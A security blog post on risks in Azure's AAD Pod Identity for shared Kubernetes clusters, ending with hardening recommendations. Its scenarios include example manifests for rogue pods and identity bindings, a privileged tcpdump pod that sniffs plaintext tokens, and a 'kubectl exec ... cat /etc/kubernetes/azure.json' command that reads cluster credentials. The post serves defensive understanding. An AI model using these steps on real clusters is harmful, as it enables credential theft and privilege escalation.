Using AAD Pod Identity in your Azure Kubernetes Clusters — what to watch out for!

A few points on how to connect pods to Azure services without compromising your security in the process.

TL;DR: The default implementation of AAD Pod Identity may not be secure enough for some types of environments/workloads. If you care about security, you will need to go beyond “kubectl apply -f…”.

Azure has been improving its products to support contextual authentication. This is powered by a feature called Managed Identities, which, in simple terms, allows you to assign an identity to an Azure compute (i.e. AKS, Virtual Machine, App Service, etc.). Applications inside that compute can then request access tokens to access other Azure services, such as a Sql Azure database or a KeyVault instance.

Without going into too much detail, this is based on the Azure Instance Metadata API: an HTTP end-point which returns a new access token when called from inside an Azure compute with this feature enabled. The URL for calling it looks like this:
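As a sketch (the resource parameter varies by target service; Key Vault is used here purely as an example):

```shell
# The Instance Metadata API is only reachable from inside an Azure compute,
# on a well-known link-local address.
IMDS_URL="http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"

# Run from inside the compute, this returns a JSON payload containing the
# access_token, its expiry, and the resource it is scoped to.
curl -s -H "Metadata: true" "$IMDS_URL"
```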

In this case specifically, instead of having a connection string in your application with a “fixed” user name and password for your database, you would instead use an access token generated at run-time. An example from the official documentation on setting this for an App Service and Sql Azure can be found here.

The idea is quite interesting and provides a few security benefits for your applications, such as:

Contextual security: access to Azure resources is based on access tokens that can only be acquired from a compute (AKS, Virtual Machine, App Service, etc.) within Azure. Therefore, this effortlessly helps you keep your environments segregated. For consistency across the whole SDLC, you can even emulate this behaviour locally with their SDK.

Fewer secrets to maintain, namely a decreased attack surface: no need to think about secret rotation for connection strings or SAS keys. Every token is generated automatically and on demand by the Instance Metadata API.

Automatic rotation of access tokens: tokens have a time to live (TTL), which by default is 60 minutes, and are automatically rotated once expired.

Last year, Microsoft started an open source project, aad-pod-identity, to bring this concept to Kubernetes clusters, allowing you to bind an Azure Managed Identity to a running Pod.

To make the security concerns raised here clearer, we will consider a multi-workload cluster, shared among at least two different teams. Each one of them being responsible for their own pipelines, namespaces (within the cluster) and resource groups (within Azure), all properly configured and with least privileges in mind.

The green box represents the cluster control plane, whilst the blue box represents the Azure control plane. The red dotted rectangle represents what Team A should have access to, whilst the blue one is the same for Team B.

The idea behind the approach above is to implement security in depth. Ensuring that if any point gets compromised, it stays contained within its vicinity and doesn’t take over the entire cluster or Azure resources. There are a lot of things that need to be put in place in order to attain that, which goes beyond this post. The goal here is to highlight where AAD Pod Identity may make it harder to attain that.

How does AAD Pod Identity Work?

Before going any further, it’s important to first understand how it all fits together.

Once deployed, aad-pod-identity will add a few new things into your cluster:

NMI

Node Managed Identity is a daemonset that hijacks (yes, this is pretty much the same as a man-in-the-middle attack) all calls to Azure’s Instance Metadata API from each node, processing them by calling MIC instead.

MIC

Managed Identity Controller is a pod that invokes Azure’s Instance Metadata API, locally caching tokens and the mapping between identities and pods.

AzureIdentity

A new Custom Resource type that represents an Azure Identity inside Kubernetes.

AzureIdentityBinding

A new Custom Resource type that links Azure Identities to Pods inside the cluster, using labels.

A sample application would look like this:
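For instance, a minimal sketch of the objects involved (names, subscription id, client id and image below are hypothetical placeholders):

```yaml
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentity
metadata:
  name: customer-identity           # hypothetical name
spec:
  type: 0                           # 0 = user-assigned Managed Identity
  ResourceID: /subscriptions/<sub-id>/resourcegroups/prod-customer-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/customer-identity
  ClientID: <client-id>
---
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentityBinding
metadata:
  name: customer-identity-binding
spec:
  AzureIdentity: customer-identity
  Selector: customer                # pods carrying this label value get the identity
---
apiVersion: v1
kind: Pod
metadata:
  name: customer-pod
  labels:
    aadpodidbinding: customer       # matches the Selector above
spec:
  containers:
    - name: app
      image: customer/app:latest    # hypothetical image
```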

There are a few things worth noting:

The association between the AzureIdentity and the Pod is made through labels.

The current version requires AzureIdentity and AzureIdentityBinding objects to reside in the default namespace. There is work in progress to allow them to be namespaced; however, it hasn’t landed as yet.

Scenarios to Watch-out for

Here are the scenarios that could lead to lateral movement and privilege escalation by abusing the default settings of this project.

Some of these considerations may or may not be relevant to you, depending largely on your security posture and your use case. For example, they matter less if you only have a single application within your cluster, a single Azure Identity shared across all applications, or if “least privilege” is generally not high on your priority list. :)

1) Re-using binding selector

By re-using the same value of the aadpodidbinding label found on the customer-pod, a rogue pod would be linked to the customer identity. If it then requests an access token from the Instance Metadata API, it will be granted one that allows it to perform any action the Customer Identity is allowed to perform in Azure:
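A sketch of such a rogue pod (namespace, names and image are hypothetical, and the label value assumes the legitimate binding uses the selector “customer”):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: rogue-pod
  namespace: team-b               # created from a different team's namespace
  labels:
    aadpodidbinding: customer     # same selector value used by customer-pod
spec:
  containers:
    - name: attacker
      image: attacker/tools:latest  # hypothetical image
      # From inside this container, a call such as:
      #   curl -H "Metadata: true" \
      #     "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
      # would now be answered with a token for the Customer identity.
```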

In this scenario, a compromised account with read access to the default namespace and create pod access anywhere else within the cluster would be able to acquire access tokens on behalf of the Customer Managed Identity.

What makes this more likely to happen is the fact that both the AzureIdentity and its binding live in a shared namespace, which can mean that multiple teams/applications have access to them, even if just read-only.

2) Creating a new Azure Identity Binding

Similarly to the scenario above, a new AzureIdentityBinding can be created, linking to the existing customer AzureIdentity.
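A sketch of such a binding (assuming the existing identity object is named customer-identity):

```yaml
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentityBinding
metadata:
  name: rogue-binding
  namespace: default               # currently required to live here
spec:
  AzureIdentity: customer-identity # the existing, legitimate identity
  Selector: rogue                  # any pod labelled aadpodidbinding: rogue gets it
```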

At this point in time, the AzureIdentityBinding object must be created in the default namespace. Once namespaces are supported, it could also be deployed in other namespaces, if the annotation forceNamespaced is not set to true.

In this case, the compromised account trying to move laterally would need pod read and AzureIdentity/Binding write access to the default namespace, as well as create pod access anywhere else within the cluster.

3) Creating a new AzureIdentity and AzureIdentityBinding

Another version of the scenario above, this time creating both an AzureIdentity and an AzureIdentityBinding, however, pointing to the Managed Identity in the prod-customer-rg resource group.
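A sketch of that pair of objects (subscription id and client id are placeholders):

```yaml
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentity
metadata:
  name: rogue-identity
spec:
  type: 0
  # Points straight at the Managed Identity in the prod-customer-rg resource group
  ResourceID: /subscriptions/<sub-id>/resourcegroups/prod-customer-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/customer-identity
  ClientID: <client-id>
---
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentityBinding
metadata:
  name: rogue-identity-binding
spec:
  AzureIdentity: rogue-identity
  Selector: rogue
```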

Access permissions and threat vectors would be pretty similar to the previous scenario.

4) Eavesdropping requests to NMI

The NMI pod “intercepts” all the requests to the Instance Metadata API and handles them internally. However, none of this traffic is sent over a secure channel (TLS). The access tokens are always transported in plain text.

Privileged pods with NET_ADMIN capabilities can eavesdrop on the network traffic of anything scheduled on the same node, and would benefit from sensitive information being sent around in plain text. It is actually worse in this case, since the end-point address is well-known.

Note that if the cluster is configured with Managed Identity enabled, the NMI pod will talk with the Azure Instance Metadata API. If it is not, it will talk with Azure AD instead, in which case part of that communication will be under TLS (from NMI to Azure AD) and part of it won’t (from the requesting pod to NMI).

This is a bit more complicated than the previous scenarios, although it only requires the compromised account to have create pod access, as long as nothing blocks the creation of privileged pods — which is the default behaviour.

Note that it does not matter which namespace the rogue pod is deployed in. A privileged pod goes beyond that level of isolation and will have access to all the traffic within the node it was scheduled on.
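The eavesdropping above could be sketched with a pod like the following (the image is illustrative; any container bundling tcpdump would do):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: sniffer
spec:
  hostNetwork: true                 # sees all node traffic, including pod-to-NMI calls
  containers:
    - name: tcpdump
      image: corfr/tcpdump          # illustrative image with tcpdump as entrypoint
      securityContext:
        privileged: true            # nothing blocks this by default
      # Capture, in plain text, everything sent to the well-known metadata end-point:
      args: ["-A", "-i", "any", "host", "169.254.169.254"]
```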

5) Access to AKS credentials

Currently, AKS stores in plain text the SPN (Service Principal Name) credential used by the cluster to talk with the Azure API. This file is physically available on each and every node. This is a known issue and I blogged about it a while ago.

The MIC pod mounts that file into itself, therefore, any user (or service account) with execute access on MIC has access to it with a single line:

kubectl exec MIC-NAME -- cat /etc/kubernetes/azure.json

Note that the existing template provided by the aad-pod-identity project places all its components in the default namespace.

The threat vector here is that any user, or service account, with pod execute access in the default namespace would be able to escalate privileges, gaining at least access to all Azure resources the cluster has. For example, it could manipulate the node VMs, load balancer, Network Security Groups (NSGs), etc.

This can also be a problem on AKS-Engine, if it was setup with useManagedIdentity = false.

Recommendations

The overall concern here is how easily lateral movement between the cluster control plane and the Azure control plane can be achieved by a non-admin user; after all, none of the scenarios above requires clusterAdmin rights.

The recommendations below cover the scenarios mentioned above for the implementation of AAD Pod Identity, but also focus on improving the isolation within the cluster. Here they are:

Do not store sensitive resources in Kubernetes namespaces that are shared across applications. If you do, apply granular permissions so that Roles only have access to what they really need.

Tightly control the RBAC of your cluster. Closely monitor the change of Roles and RoleBindings (and their cluster level counter-parts).

Use PodSecurityPolicies to restrict the creation of privileged pods.

Closely monitor privileged pods for suspicious behaviour.

Lock down AzureIdentity and AzureIdentityBinding objects to their application namespaces, also setting forceNamespaced=true once that feature is available. Making it look like this:
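As a sketch, assuming the forceNamespaced behaviour has landed and MIC/NMI are deployed with it enabled (names and ids below are hypothetical):

```yaml
# With forceNamespaced=true, bindings only match pods in their own namespace,
# so the identity objects can live with the application instead of in default.
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentity
metadata:
  name: customer-identity
  namespace: customer               # the application's own namespace
spec:
  type: 0
  ResourceID: /subscriptions/<sub-id>/resourcegroups/prod-customer-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/customer-identity
  ClientID: <client-id>
---
apiVersion: aadpodidentity.k8s.io/v1
kind: AzureIdentityBinding
metadata:
  name: customer-identity-binding
  namespace: customer
spec:
  AzureIdentity: customer-identity
  Selector: customer
```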

After thoughts…

Almost two decades ago it was quite common to find references to SD3+C in Microsoft’s security literature. That concept was a shorthand for: Secure by Design, Secure by Default, Secure in Deployment, and Communications. Basic concepts which encouraged a more holistic view of security in software development.

That concept was as valid then, as it is now, especially when security is high on your priority list. However, it is clear that Secure by Default is not “top of mind” in quite a few open source projects (including Kubernetes), which then requires a lot more know-how from end-users to implement them securely.